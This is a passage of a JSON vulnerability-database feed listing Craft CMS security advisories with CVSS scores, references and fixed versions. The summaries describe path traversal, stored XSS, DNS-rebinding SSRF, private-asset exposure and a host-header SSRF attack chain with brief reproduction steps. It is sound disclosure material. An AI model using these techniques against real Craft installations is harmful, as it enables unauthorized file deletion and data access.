security/advisories/GHSA-6mrr-q3pj-h53w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33159","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33159"},{"reference_url":"https://github.com/advisories/GHSA-6mrr-q3pj-h53w","reference_id":"GHSA-6mrr-q3pj-h53w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-6mrr-q3pj-h53w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33159","GHSA-6mrr-q3pj-h53w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eaxm-rjr7-xudb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91685?format=json","vulnerability_id":"VCID-efwv-r3nc-73h9","summary":"Craft CMS has a Path Traversal Vulnerability in AssetsController\nThe `AssetsController->replaceFile()` method has a `targetFilename` body parameter that is used unsanitized in a `deleteFile()` call before `Assets::prepareAssetName()` is applied on save. This allows an authenticated user with `replaceFiles` permission to delete arbitrary files within the same filesystem root by injecting `../` path traversal sequences into the filename.\n\nThis could allow an authenticated user with `replaceFiles` permission on one volume to delete files in other folders/volumes that share the same filesystem root.\n\nThis only affects local filesystems.\n\nUsers should update to Craft 4.17.5 or 5.9.11 to mitigate the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32262","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12349","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32262"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/c997efbe4c66c14092714233aeebff15cdbfcf11","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T15:21:57Z/"}],"url":"https://github.com/craftcms/cms/commit/c997efbe4c66c14092714233aeebff15cdbfcf11"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-472v-j2g4-g9h2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T15:21:57Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-472v-j2g4-g9h2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32262","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32262"},{"reference_url":"https://github.com/advisories/GHSA-472v-j2g4-g9h2","reference_id":"GHSA-472v-j2g4-g9h2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-472v-j2g4-g9h2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113015?format=json","purl":"pkg:composer/craftcms/cms@5.9.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.11"}],"aliases":["CVE-2026-32262","GHSA-472v-j2g4-g9h2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-efwv-r3nc-73h9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50859?format=json","vulnerability_id":"VCID-esma-wxje-eqh3","summary":"Craft CMS Vulnerable to Stored XSS via User Group Name in User Permissions Page\nA stored XSS vulnerability exists in the User Permissions page. The User Group name is rendered without proper HTML escaping in the permissions section, allowing an attacker to execute arbitrary JavaScript when another user views or edits a user's permissions.\n\n> [!NOTE]\n> This is a separate vulnerability from the previously reported \"[Stored XSS via User Group Name in User Settings Page](https://github.com/craftcms/cms/security/advisories/GHSA-2423-8xxj-wc3g)\" and \"[Multiple Stored XSS in User Group Edit Page](https://github.com/craftcms/cms/security/advisories/GHSA-vx7g-xw92-g4xj)\". This affects a different sink: the individual user's permissions page.","references":[{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"1.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"1.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://github.com/advisories/GHSA-g3hp-vvqf-8vw6","reference_id":"GHSA-g3hp-vvqf-8vw6","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g3hp-vvqf-8vw6"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-g3hp-vvqf-8vw6","reference_id":"GHSA-g3hp-vvqf-8vw6","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"1.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-g3hp-vvqf-8vw6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["GHSA-g3hp-vvqf-8vw6"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-esma-wxje-eqh3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50298?format=json","vulnerability_id":"VCID-fpea-e48p-kfbn","summary":"Craft CMS has Cloud Metadata SSRF Protection Bypass via DNS Rebinding\nThe SSRF validation in Craft CMS’s GraphQL Asset mutation performs DNS resolution **separately** from the HTTP request. This Time-of-Check-Time-of-Use (TOCTOU) vulnerability enables DNS rebinding attacks, where an attacker’s DNS server returns different IP addresses for validation compared to the actual request.\n\nThis is a bypass of the security fix for CVE-2025-68437 ([GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc)) that allows access to all blocked IPs, not just IPv6 endpoints.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27127","reference_id":"","reference_type":"","scores":[{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00719","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27127"},{"reference_url":"https://curl.se/libcurl/c/CURLOPT_RESOLVE.html","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://curl.se/libcurl/c/CURLOPT_RESOLVE.html"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/a4cf3fb63bba3249cf1e2882b18a2d29e77a8575","reference_id":"","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:12:07Z/"}],"url":"https://github.com/craftcms/cms/commit/a4cf3fb63bba3249cf1e2882b18a2d29e77a8575"},{"reference_url":"https://github.com/mogwailabs/DNSrebinder","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/mogwailabs/DNSrebinder"},{"reference_url":"https://github.com/nccgroup/singularity","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nccgroup/singularity"},{"reference_url":"https://github.com/taviso/rbndr","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/taviso/rbndr"},{"reference_url":"https://unit42.paloaltonetworks.com/dns-rebinding","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://unit42.paloaltonetworks.com/dns-rebinding"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27127","reference_id":"CVE-2026-27127","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27127"},{"reference_url":"https://github.com/advisories/GHSA-gp2f-7wcm-5fhx","reference_id":"GHSA-gp2f-7wcm-5fhx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gp2f-7wcm-5fhx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-gp2f-7wcm-5fhx","reference_id":"GHSA-gp2f-7wcm-5fhx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:12:07Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-gp2f-7wcm-5fhx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:12:07Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27127","GHSA-gp2f-7wcm-5fhx"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fpea-e48p-kfbn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91247?format=json","vulnerability_id":"VCID-fpke-p7sz-nfc9","summary":"Craft CMS may expose private assets through anonymous \"generate transform\" calls via transform URL\n### Summary\n\nAn unauthenticated user can call `assets/generate-transform` with a private `assetId`, receive a valid transform URL, and fetch transformed image bytes.\n\nThe endpoint is anonymous and does not enforce per-asset authorization before returning the transform URL.\n\n### Details\n\nRoot cause:\n- Anonymous endpoint accepts user-controlled asset reference.\n- It creates and returns a transform URL for that asset without checking access rights.\n- If the transform output is reachable, guest users can read content derived from private assets.\n\nWho is impacted:\n\n- Installations where private source assets can be transformed and transform URLs are reachable.\n\nSecurity consequence:\n\n  - Anonymous users can obtain content derived from private assets without authentication.\n\n### Resources\n\nhttps://github.com/craftcms/cms/commit/7290d91639e","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33160","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03997","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33160"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-5pgf-h923-m958","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-5pgf-h923-m958"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33160","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33160"},{"reference_url":"https://github.com/craftcms/cms/commit/7290d91639e","reference_id":"7290d91639e","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/commit/7290d91639e"},{"reference_url":"https://github.com/advisories/GHSA-5pgf-h923-m958","reference_id":"GHSA-5pgf-h923-m958","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-5pgf-h923-m958"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33160","GHSA-5pgf-h923-m958"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fpke-p7sz-nfc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89272?format=json","vulnerability_id":"VCID-gzry-xtu5-ukhu","summary":"Craft CMS has a host header injection leading to SSRF via resource-js endpoint\n### Summary\n\nThe `resource-js` endpoint in Craft CMS allows unauthenticated requests to proxy remote JavaScript resources. \nWhen `trustedHosts` is not explicitly restricted (default configuration), the application trusts the client-supplied Host header. \n\nThis allows an attacker to control the derived `baseUrl`, which is used in prefix validation inside `actionResourceJs()`. \nBy supplying a malicious Host header, the attacker can make the server issue arbitrary HTTP requests, leading to Server-Side Request Forgery (SSRF).\n\n### Details\n\nThe vulnerability exists in `AppController::actionResourceJs()`.\n\nThe function validates that the `url` parameter starts with `assetManager->baseUrl`. However, `baseUrl` is derived from the current request host. If `trustedHosts` is not configured, the Host header is fully attacker-controlled.\n\nAttack chain:\n\n1. Attacker sends request with controlled `Host` header.\n2. Application derives `baseUrl` from the malicious Host.\n3. `url` parameter is required to start with this `baseUrl`.\n4. Validation passes.\n5. Guzzle performs a server-side HTTP request to the attacker-controlled host.\n6. SSRF occurs.\n\nThis does not rely on string parsing bypass. It relies on Host header trust.\n\n### PoC (safe reproduction steps)\n\nEnvironment:\n- Craft CMS 5.9.12\n- Default configuration (no trustedHosts restriction)\n- Docker deployment\n\n1. Start a listener inside the container:\n   python3 -m http.server 9999\n\n2. Send a request to resource-js with a controlled Host header.\n\n3. Observe that the internal listener receives a request (OOB confirmation).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41130","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1631","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41130"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/ebe7e85f1c89700d64332f72492be2e9a594e783","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-22T14:18:44Z/"}],"url":"https://github.com/craftcms/cms/commit/ebe7e85f1c89700d64332f72492be2e9a594e783"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-95wr-3f2v-v2wh","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-22T14:18:44Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-95wr-3f2v-v2wh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41130","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41130"},{"reference_url":"https://github.com/advisories/GHSA-95wr-3f2v-v2wh","reference_id":"GHSA-95wr-3f2v-v2wh","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-95wr-3f2v-v2wh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110278?format=json","purl":"pkg:composer/craftcms/cms@5.9.15","is_vulnerable":true,"affected_by_vulnera